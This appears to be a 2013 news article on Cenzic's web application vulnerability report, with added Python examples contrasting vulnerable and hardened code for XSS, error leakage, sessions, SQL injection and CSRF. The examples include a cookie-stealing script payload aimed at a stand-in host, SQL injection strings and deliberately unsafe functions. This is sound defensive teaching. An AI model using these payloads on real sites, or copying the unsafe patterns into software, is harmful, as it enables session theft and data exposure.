5 Dangerous Web Application Flaws Coveted By Attackers
4:00 PM EST Fri. Mar. 08, 2013
Ninety-nine percent of applications have one or more vulnerabilities, according to the 2013 Application Vulnerability Trends Report issued by Campbell, Calif.-based application security firm Cenzic. The firm found that the median number of vulnerabilities per tested application is 13. Many of the high-profile data breaches over the past several months were the result of a common Web application vulnerability. While it may be impossible to eradicate all flaws in Web applications, software security experts say eliminating the most commonly targeted errors could help mitigate the risk of many automated attacks and cause some hackers to move on to easier pickings.
Cross-site scripting (XSS) vulnerabilities are the most commonly detected class of vulnerability in Web applications, and they are also among the flaws most frequently targeted by cybercriminals. An XSS flaw lets an attacker inject script into a page served by an otherwise trusted site, so the script runs in victims' browsers with that site's privileges, according to Cenzic. XSS vulnerabilities appear in 61 percent of applications, the firm said. While much has been said about detecting and fixing XSS errors, the Internet is still riddled with Web applications that contain them. They can be detected with a Web application security scanner or blocked using a Web application firewall, but a firewall is a stopgap: the durable fix is to encode untrusted data for the context in which the page renders it.
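The following is an added example, not code from the article or from Cenzic, showing the difference between splicing user input into HTML and encoding it for the context it lands in. The search page, the payloads and the helper names are all constructed for illustration.

```python
import html
from urllib.parse import quote

# Constructed attacker inputs: one for an element body, one that tries to
# break out of a quoted attribute and add an event handler.
SCRIPT_PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(1)'


def render_search_unsafe(query: str) -> str:
    """Vulnerable: the user-controlled query is concatenated straight into HTML."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    """Hardened: encode for the HTML element context before interpolating."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_input_unsafe(value: str) -> str:
    """Vulnerable: a quote in the value closes the attribute early."""
    return f'<input name="q" value="{value}">'


def render_input_safe(value: str) -> str:
    """Hardened: quote=True also encodes ' and ", so the value cannot
    terminate the attribute it is placed in."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def render_link_safe(query: str) -> str:
    """URL-in-attribute context needs two encoders applied in order:
    percent-encode the value for the URL, then HTML-encode the attribute."""
    href = "/search?q=" + quote(query, safe="")
    return f'<a href="{html.escape(href, quote=True)}">search again</a>'


def contains_active_script(markup: str) -> bool:
    """Crude check used only to compare the renderers: is there still an
    un-encoded <script tag in the output?"""
    return "<script" in markup.lower()
```

`html.escape` is the element- and attribute-context encoder; a JavaScript or CSS context would need its own, which is why template engines that auto-escape per context are preferable to hand-written concatenation.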
Information leakage was found in only 17 percent of the Web applications Cenzic tested in 2012, but the danger posed by the vulnerability makes finding and eliminating such flaws critical. Web applications can leak information in a variety of ways. Sometimes an attacker can make the application fail, prompting an error message that reveals clues about the application itself or the infrastructure behind it, such as database names, internal hostnames or file paths. Poorly implemented encryption also can yield information to an attacker.
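An added example (not from the article) of the error-message case: a leaky handler that returns the raw exception and stack trace, beside a hardened one that logs the detail server-side under a random reference id and shows the client only that id. The failing backend call, the internal hostname in its message and the in-memory log sink are constructed for the demonstration.

```python
import logging
import secrets
import traceback

# Constructed in-memory log sink so the example runs without a real logging setup.
LOG_RECORDS = []


class _ListHandler(logging.Handler):
    def emit(self, record):
        LOG_RECORDS.append(self.format(record))


log = logging.getLogger("app")
log.addHandler(_ListHandler())
log.setLevel(logging.ERROR)
log.propagate = False


def lookup_user(user_id: str) -> dict:
    """Stand-in for a database call that fails with a backend-specific error
    (hostname and port are made up)."""
    raise RuntimeError(
        f"connection to postgres://db-internal.corp:5432/users refused for id {user_id!r}"
    )


def handle_unsafe(user_id: str):
    """Leaky: the raw exception text and stack trace go straight to the client,
    telling an attacker which database, host and code paths are in play."""
    try:
        return 200, str(lookup_user(user_id))
    except Exception:
        return 500, "<pre>" + traceback.format_exc() + "</pre>"


def handle_safe(user_id: str):
    """Hardened: full detail is logged under a random reference id; the client
    receives only a generic message plus that id for support to correlate."""
    try:
        return 200, str(lookup_user(user_id))
    except Exception:
        ref = secrets.token_hex(8)
        log.error("ref=%s unhandled error:\n%s", ref, traceback.format_exc())
        return 500, f"Something went wrong. Reference: {ref}"


def reference_from_body(body: str) -> str:
    """Extract the reference id the safe handler returned."""
    return body.rsplit("Reference: ", 1)[1]
```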
Attackers can take advantage of poorly implemented session management to hijack sessions and act as legitimate website users. Session management vulnerabilities were detected in 80 percent of applications tested in 2012, more than any other application vulnerability class, according to Cenzic. Software security experts at the Open Web Application Security Project (OWASP) say the use of an application framework with built-in session management is key to developing an application that keeps each user's actions within a unique, unguessable session. The group discourages developers from implementing their own session management.
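What a framework's built-in session handling does for you, as an added example rather than code from the article or OWASP: server-side storage keyed by an opaque random id, rotation of the id when the user logs in (so a session fixation attack is defeated), an idle timeout, and protective cookie attributes. The store, the timeout value and the cookie name are assumptions for illustration.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60  # seconds; assumed policy value


class SessionStore:
    """In-memory server-side session store. The browser holds only an opaque
    random token; all state lives here, keyed by that token."""

    def __init__(self, clock=time.time):
        self._sessions = {}
        self._clock = clock  # injectable so expiry can be tested without sleeping

    def create(self, data=None) -> str:
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, not a counter
        self._sessions[sid] = {"data": dict(data or {}), "last_seen": self._clock()}
        return sid

    def get(self, sid):
        """Return the session data, or None if the id is unknown or idle-expired."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        now = self._clock()
        if now - entry["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        entry["last_seen"] = now
        return entry["data"]

    def login(self, old_sid, user) -> str:
        """Rotate the id on privilege change: a token an attacker planted in the
        victim's browser before login (session fixation) is worthless afterwards."""
        data = dict(self.get(old_sid) or {})
        self._sessions.pop(old_sid, None)
        data["user"] = user
        return self.create(data)

    def destroy(self, sid):
        self._sessions.pop(sid, None)


def session_cookie(sid: str) -> str:
    """Set-Cookie value a framework would emit: unreadable by script (HttpOnly),
    HTTPS-only (Secure) and not attached to cross-site requests (SameSite)."""
    return f"sid={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"
```

Hand-rolled implementations typically get one of these wrong: ids derived from user id or time, no rotation at login, no expiry, or cookies missing `HttpOnly` and `Secure`, which is why OWASP's advice is to use the framework's implementation.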
SQL injection is a favorite vulnerability of attackers because automated tools can make a website pass attacker-supplied SQL to the underlying database and expose its contents. Cenzic said that while all other classes of vulnerabilities declined in 2012, SQL injection rose, but the firm said that could be due to improvements in detection tools more than to new deficiencies in security practices. SQL injection was found in 16 percent of all Web applications Cenzic tested in 2012.
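An added example, not from the article, of how an automated tool turns a string-concatenated query into a data dump, beside the parameterized version that is immune to it. The in-memory SQLite database, its two rows and the payloads are constructed for the demonstration.

```python
import sqlite3

# Constructed payloads of the kind a scanner sends: the first closes the string
# literal and adds an always-true condition, the second appends a UNION that
# pulls another column into the result set. "--" comments out the trailing quote.
TAUTOLOGY = "x' OR 1=1 --"
UNION_DUMP = "x' UNION SELECT id, password_hash FROM users --"


def make_db() -> sqlite3.Connection:
    """Constructed sample database with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b")],
    )
    conn.commit()
    return conn


def find_user_unsafe(conn, username: str) -> list:
    """Vulnerable: the value is spliced into the SQL text, so quotes and
    keywords in it become part of the statement."""
    sql = f"SELECT id, username FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username: str) -> list:
    """Hardened: the value travels as a bound parameter; the database compares
    it as a string and never parses it as SQL."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()
```

Parameter binding covers values only; table and column names cannot be bound and must come from an allow-list if they are ever user-influenced.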
Cross-site request forgery (CSRF) was found in 22 percent of all Web applications tested by Cenzic in 2012. The class of vulnerabilities that make up CSRF allows attackers to send pre-authenticated but unauthorized commands using credentials that the application trusts, according to Cenzic. Attackers can use a CSRF attack to "ride" a victim's session on a particular website because the browser automatically attaches the victim's cookies to a request the attacker's page triggers. In addition to a page in the browser, an attacker can deliver the forged request from a malicious script in a Microsoft Office document or Flash file.
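An added example (not from the article or Cenzic) of a "session riding" transfer request and the synchronizer-token check that stops it. The application's own form carries a token derived from the session id with a server secret; a page on another origin can make the victim's browser send the cookie, but cannot read the token to include it. The session table, account balances, request shape and secret are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets

# Assumed server secret; in production load it from configuration, never hardcode.
SERVER_SECRET = secrets.token_bytes(32)

# Constructed session table: cookie value -> logged-in user.
SESSIONS = {"s1": "victim"}


def csrf_token(session_id: str) -> str:
    """Token the server embeds in its own forms: an HMAC over the session id,
    so a token is only valid together with the session it was issued for."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id: str, submitted) -> bool:
    """Constant-time comparison; a missing or non-string token fails closed."""
    if not isinstance(submitted, str):
        return False
    expected = csrf_token(session_id)
    return hmac.compare_digest(expected.encode(), submitted.encode())


def _authenticated_user(request: dict):
    return SESSIONS.get(request["cookies"].get("sid"))


def _do_transfer(user: str, form: dict, accounts: dict) -> bool:
    amount = int(form["amount"])
    if amount <= 0 or accounts.get(user, 0) < amount or form["to"] not in accounts:
        return False
    accounts[user] -= amount
    accounts[form["to"]] += amount
    return True


def transfer_unsafe(request: dict, accounts: dict) -> bool:
    """Vulnerable: acts on any request that carries a valid session cookie,
    regardless of which site caused the browser to send it."""
    user = _authenticated_user(request)
    return user is not None and _do_transfer(user, request["form"], accounts)


def transfer_safe(request: dict, accounts: dict) -> bool:
    """Hardened: additionally requires the per-session token in the form body."""
    user = _authenticated_user(request)
    if user is None or not verify_csrf(request["cookies"]["sid"], request["form"].get("csrf")):
        return False
    return _do_transfer(user, request["form"], accounts)


def legitimate_request() -> dict:
    """Request produced by the site's own form, which embedded the token."""
    return {"cookies": {"sid": "s1"},
            "form": {"to": "friend", "amount": "10", "csrf": csrf_token("s1")}}


def forged_request() -> dict:
    """Request triggered by an attacker's page: the browser adds the cookie,
    but the attacker cannot read the token, so the form lacks it."""
    return {"cookies": {"sid": "s1"},
            "form": {"to": "attacker", "amount": "50"}}
```

A `SameSite` attribute on the session cookie adds a second, browser-enforced layer, but the token check is what protects clients and request paths the attribute does not cover.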